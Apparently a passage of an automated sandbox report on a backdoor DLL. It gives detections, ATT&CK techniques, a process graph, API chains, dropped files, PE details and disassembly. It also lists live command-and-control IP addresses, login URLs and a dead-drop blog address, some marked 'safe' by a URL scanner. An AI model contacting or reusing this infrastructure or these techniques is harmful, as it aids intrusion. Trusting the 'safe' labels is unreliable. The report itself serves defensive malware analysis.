Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010050 GetLocalTime,SystemTimeToFileTime,3_2_10010050
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10007420 CreateThread,Sleep,GetVersionExA,Sleep,sprintf,3_2_10007420

Stealing of Sensitive Information

barindex
Queries disk data (e.g. SMART data)
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10005E10 WSAStartup,socket,socket,socket,htons,htons,inet_addr,inet_addr,htons,inet_addr,bind,ioctlsocket,select,WSAGetLastError,Sleep,recvfrom,wsprintfA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,malloc,htons,htons,htons,htons,htons,htons,htonl,htons,inet_addr,sendto,closesocket,closesocket,closesocket,WSACleanup,3_2_10005E10

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Service Execution		2
Windows Service		1
Access Token Manipulation		21
Obfuscated Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt11
Registry Run Keys / Startup Folder		2
Windows Service		1
Software Packing		Security Account Manager114
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Bootkit		111
Process Injection		1
DLL Side-Loading		NTDS11
Security Software Discovery		Distributed Component Object ModelInput Capture1
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
Registry Run Keys / Startup Folder		1
Masquerading		LSA Secrets21
Virtualization/Sandbox Evasion		SSHKeylogging1
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Virtualization/Sandbox Evasion		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Access Token Manipulation		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
Process Injection		Proc Filesystem1
Remote System Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Bootkit		/etc/passwd and /etc/shadow1
System Network Configuration Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Rundll32		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558496 Sample: NaRZIOq3O8.dll Startdate: 19/11/2024 Architecture: WINDOWS Score: 100 61 blogx.sina.com.cn 2->61 63 blog.sina.com.cn 2->63 81 Malicious sample detected (through community Yara rule) 2->81 83 Antivirus / Scanner detection for submitted sample 2->83 85 Multi AV Scanner detection for submitted file 2->85 87 3 other signatures 2->87 10 loaddll32.exe 1 2->10         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        signatures3 process4 process5 16 rundll32.exe 1 14 10->16         started        20 cmd.exe 1 10->20         started        22 rundll32.exe 10->22         started        24 conhost.exe 10->24         started        26 cmd.exe 12->26         started        28 cmd.exe 14->28         started        dnsIp6 55 107.163.241.185, 16300 TAKE2US United States 16->55 57 107.163.241.186, 12354 TAKE2US United States 16->57 59 2 other IPs or domains 16->59 67 System process connects to network (likely due to code injection or exploit) 16->67 69 Found evasive API chain (may stop execution after checking mutex) 16->69 71 Contains functionality to infect the boot sector 16->71 73 Creates an autostart registry key pointing to binary in C:\Windows 16->73 75 Uses ping.exe to sleep 20->75 77 Uses ping.exe to check the status of other devices and networks 20->77 30 rundll32.exe 20->30         started        79 Queries disk data (e.g. SMART data) 22->79 33 cmd.exe 22->33         started        35 conhost.exe 26->35         started        37 PING.EXE 1 26->37         started        39 conhost.exe 28->39         started        41 PING.EXE 1 28->41         started        signatures7 process8 signatures9 91 Queries disk data (e.g. SMART data) 30->91 43 cmd.exe 1 30->43         started        93 Uses ping.exe to sleep 33->93 46 conhost.exe 33->46         started        48 PING.EXE 1 33->48         started        process10 signatures11 89 Uses ping.exe to sleep 43->89 50 PING.EXE 1 43->50         started        53 conhost.exe 43->53         started        process12 dnsIp13 65 127.0.0.1 unknown unknown 50->65

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
NaRZIOq3O8.dll89%ReversingLabsWin32.Backdoor.Venik
NaRZIOq3O8.dll100%AviraTR/Patched.Ren.Gen
NaRZIOq3O8.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://107.163.241.186:12354/login.php;0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpU)U0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpData0%Avira URL Cloudsafe
http://107.163.241.185:16300/0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.php_kt0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpykV0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpogs0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.php#)o0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpwk0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.php)0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.php()b0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpB)H0%Avira URL Cloudsafe
http://107.163.24I0%Avira URL Cloudsafe
http://www.rsac.org/ratingsv01.html0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpSk0%Avira URL Cloudsafe
http://107.163.241.185:16300//joy.asp?sid=rungnejcndvgnJLfFe5vteX8v2LUicbtudb8mteXmJe1nde0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpckP0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpMkb0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpbV0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.phpAkn0%Avira URL Cloudsafe
http://107.163.241.186:12354/login.php0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
blogx.sina.com.cn
202.108.0.52
truefalse
    		high
    blog.sina.com.cn
    		unknown
    		unknownfalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://blog.sina.com.cn/u/5655029807OW64rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://107.163.241.186:12354/login.php;rundll32.exe, 00000003.00000002.3769274572.000000000584A000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://107.163.241.185:16300/rundll32.exe, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://107.163.241.186:12354/login.phpogsrundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://107.163.241.186:12354/login.phpU)Urundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://107.163.241.186:12354/login.phpDatarundll32.exe, 00000003.00000002.3755445264.0000000002A6F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://blog.sina.com.cn/u/5655029807pSkrundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://107.163.241.186:12354/login.php_ktrundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://blog.sina.com.cn/u/5655029807.rundll32.exe, 00000003.00000002.3769344739.000000000597D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://107.163.241.186:12354/login.php#)orundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://107.163.241.186:12354/login.phpykVrundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://blog.sina.com.cn/u/%srundll32.exe, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://107.163.241.186:12354/login.php)rundll32.exe, 00000003.00000002.3769043111.000000000562D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3768985716.00000000055AD000.00000004.00000010.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://107.163.241.186:12354/login.phpwkrundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://107.163.241.186:12354/login.php()brundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://107.163.241.186:12354/login.phpB)Hrundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.rsac.org/ratingsv01.htmlrundll32.exe, 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmp, NaRZIOq3O8.dllfalse
              • Avira URL Cloud: safe
              		unknown
              http://107.163.241.185:16300//joy.asp?sid=rungnejcndvgnJLfFe5vteX8v2LUicbtudb8mteXmJe1nderundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rzrundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://blog.sina.com.cn/u/5655029807rundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://blog.sina.com.cn/u/5655029807prundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://107.163.241.186:12354/login.phpSkrundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://107.163.24Irundll32.exe, 00000003.00000002.3768985716.00000000055AD000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://blog.sina.com.cn/u/5655029807osoftrundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://107.163.241.186:12354/login.phpckPrundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://107.163.241.186:12354/login.phpAknrundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://107.163.241.186:12354/login.phpMkbrundll32.exe, 00000003.00000003.3057253768.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://107.163.241.186:12354/login.phpbVrundll32.exe, 00000003.00000002.3755445264.0000000002B04000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://107.163.241.186:12354/login.phprundll32.exe, 00000003.00000002.3755445264.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      202.108.0.52
                      		blogx.sina.com.cnChina
                      		4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                      107.163.241.186
                      		unknownUnited States
                      		20248TAKE2UStrue
                      107.163.241.185
                      		unknownUnited States
                      		20248TAKE2UStrue
                      107.163.241.193
                      		unknownUnited States
                      		20248TAKE2UStrue

                      Private

                      IP
                      127.0.0.1

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1558496
                      Start date and time:2024-11-19 14:22:13 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 7s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:26
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:NaRZIOq3O8.dll
                      renamed because original name is a hash value
                      Original Sample Name:e999daea87b481d11b4fd8559bdd3d68516dc0ef.dll
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winDLL@31/1@5/5
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 43
                      • Number of non-executed functions: 43
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: NaRZIOq3O8.dll

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      08:23:08API Interceptor1x Sleep call for process: loaddll32.exe modified
                      08:23:36API Interceptor2585226x Sleep call for process: rundll32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      202.108.0.52VqCbf9fhnQ.exeGet hashmaliciousUnknownBrowse
                      • blog.sina.com.cn/u/5655029807
                      k4F4uRTZZR.dllGet hashmaliciousUnknownBrowse
                      • blog.sina.com.cn/u/5655029807
                      5jme4p7u76.exeGet hashmaliciousUnknownBrowse
                      • blog.sina.com.cn/u/5655029807
                      107.163.241.18633twe7X26S.dllGet hashmaliciousUnknownBrowse
                        5jme4p7u76.exeGet hashmaliciousUnknownBrowse
                          107.163.241.18533twe7X26S.dllGet hashmaliciousUnknownBrowse
                            5jme4p7u76.exeGet hashmaliciousUnknownBrowse
                              107.163.241.19333twe7X26S.dllGet hashmaliciousUnknownBrowse
                                k4F4uRTZZR.dllGet hashmaliciousUnknownBrowse
                                  5jme4p7u76.exeGet hashmaliciousUnknownBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    blogx.sina.com.cnMYuRWuVXzX.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    gmqIbj35WF.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    81mieek02V.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    Vb1S2HJcnN.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    VqCbf9fhnQ.exeGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    k4F4uRTZZR.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    http://zeuso.ccGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    02hNixBIvP.exeGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    5jme4p7u76.exeGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TAKE2US33twe7X26S.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.241.193
                                    MYuRWuVXzX.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.110
                                    JwLT3elUtn.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.43.161
                                    yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.240
                                    46PhJ3XpBT.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.43.236
                                    01JkTmNJhe.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.43.235
                                    oQy3XhO4cX.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.251
                                    gmqIbj35WF.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.240
                                    Bcr1Wl2Jn0.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.240
                                    OL50O9ho5M.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.251
                                    TAKE2US33twe7X26S.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.241.193
                                    MYuRWuVXzX.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.110
                                    JwLT3elUtn.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.43.161
                                    yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.240
                                    46PhJ3XpBT.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.43.236
                                    01JkTmNJhe.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.43.235
                                    oQy3XhO4cX.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.251
                                    gmqIbj35WF.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.240
                                    Bcr1Wl2Jn0.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.240
                                    OL50O9ho5M.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.251
                                    CHINA169-BJChinaUnicomBeijingProvinceNetworkCNMYuRWuVXzX.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    gmqIbj35WF.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    81mieek02V.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    Vb1S2HJcnN.dllGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    owari.mips.elfGet hashmaliciousUnknownBrowse
                                    • 111.193.177.206
                                    owari.x86.elfGet hashmaliciousUnknownBrowse
                                    • 60.194.199.155
                                    VqCbf9fhnQ.exeGet hashmaliciousUnknownBrowse
                                    • 202.108.0.52
                                    hmips.elfGet hashmaliciousMiraiBrowse
                                    • 111.196.123.227
                                    botx.m68k.elfGet hashmaliciousMiraiBrowse
                                    • 123.112.202.42
                                    TAKE2US33twe7X26S.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.241.193
                                    MYuRWuVXzX.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.110
                                    JwLT3elUtn.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.43.161
                                    yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.240
                                    46PhJ3XpBT.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.43.236
                                    01JkTmNJhe.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.43.235
                                    oQy3XhO4cX.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.251
                                    gmqIbj35WF.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.240
                                    Bcr1Wl2Jn0.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.240
                                    OL50O9ho5M.dllGet hashmaliciousUnknownBrowse
                                    • 107.163.56.251

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\1.txt

                                    Download File
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:ISO-8859 text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):812
                                    Entropy (8bit):4.3571728803400465
                                    Encrypted:false
                                    SSDEEP:12:82vQnZ4oTzmmMrJk2qSCz/+ogjgjgjgjgjgjgjgjgR:82WDMrJkXqh
                                    MD5:B8A7CA3310C0048B9E0F577E01844BB2
                                    SHA1:FF1152820A4C88C77F741D53FE062ECAB673BA1F
                                    SHA-256:1BA9E7418B04DB1005E7D51D36E146CB51C051046AF72706F7899146A1FD079C
                                    SHA-512:1B103098A091609061BDF9426AB11B0B79DD9B01D289E272261FCFAD8C0685398FA00C794E776DEAD87602A1D8993DCDAFFDB16E296566AEA84AA382E4905EF1
                                    Malicious:false
                                    Preview:..2024-11-19 12:17..iOffset....2024-11-19 18:33..iOffset....2024-11-20 01:09..iOffset....2024-11-20 08:45..iOffset....2024-11-20 14:41..iOffset....2024-11-20 23:08..iOffset....2024-11-21 08:59..iOffset....2024-11-21 23:05..iOffset....2024-11-22 20:41..iOffset....2024-11-24 10:42..iOffset....2024-11-25 21:03..iOffset....2025-09-26 02:19..iOffset....2026-07-25 01:57..iOffset....2028-02-02 02:58..iOffset....2029-10-10 15:24..iOffset....2031-06-19 11:25..iOffset....2033-02-17 20:16..iOffset....2034-10-02 12:07..iOffset....2036-04-15 07:18..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset....2037-02-08 09:26..iOffset..

                                    Static File Info

                                    General

                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                    Entropy (8bit):7.818659598157651
                                    TrID:
                                    • Win32 Dynamic Link Library (generic) (1002004/3) 94.25%
                                    • UPX compressed Win32 Executable (30571/9) 2.88%
                                    • Win32 EXE Yoda's Crypter (26571/9) 2.50%
                                    • Generic Win/DOS Executable (2004/3) 0.19%
                                    • DOS Executable Generic (2002/1) 0.19%
                                    File name:NaRZIOq3O8.dll
                                    File size:100'093 bytes
                                    MD5:8ae5deac29c6d351c2376da97b75b88a
                                    SHA1:e999daea87b481d11b4fd8559bdd3d68516dc0ef
                                    SHA256:6831f236816f9799458cff0c50116bcc3029f57e8cd8ab181204bc914789c1df
                                    SHA512:a69fd417bda9b491924222066f77172c6c2a217ec6e9269f4037ff2953afb7148a31465f48705480ccc862e10c86185cb595482b9ed9c93a4dd48194396b0582
                                    SSDEEP:3072:BDpG6gzgHr5tCmfk455ecDBkdq+SStvAbGh:5pG6Sg9txRk/SS6bGh
                                    TLSH:B0A301F6290D7DD6CB35483AD6628E35F929EE348C589F887ECE6C13ACB8510E1641F1
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.......N.......N.K.....N.F.....N.F.@...N.-.D...N...O...N.-.E...N.}.H...N.-.J...N.Rich..N.........PE..L..

                                    File Icon

                                    Icon Hash:7ae282899bbab082

                                    Static PE Info

                                    General

                                    Entrypoint:0x10037000
                                    Entrypoint Section:fdss
                                    Digitally signed:false
                                    Imagebase:0x10000000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                    DLL Characteristics:
                                    Time Stamp:0x5644242A [Thu Nov 12 05:31:22 2015 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:e410f49346b1cb4eeca484464a7085c8

                                    Entrypoint Preview

                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    push FFFFFFFFh
                                    push 000A2C2Ah
                                    push 000D9038h
                                    mov eax, dword ptr fs:[00000000h]
                                    push eax
                                    mov dword ptr fs:[00000000h], esp
                                    pop eax
                                    mov dword ptr fs:[00000000h], eax
                                    pop eax
                                    pop eax
                                    pop eax
                                    pop eax
                                    mov ebp, eax
                                    mov eax, 10034530h
                                    jmp eax
                                    nop
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    sub eax, dword ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
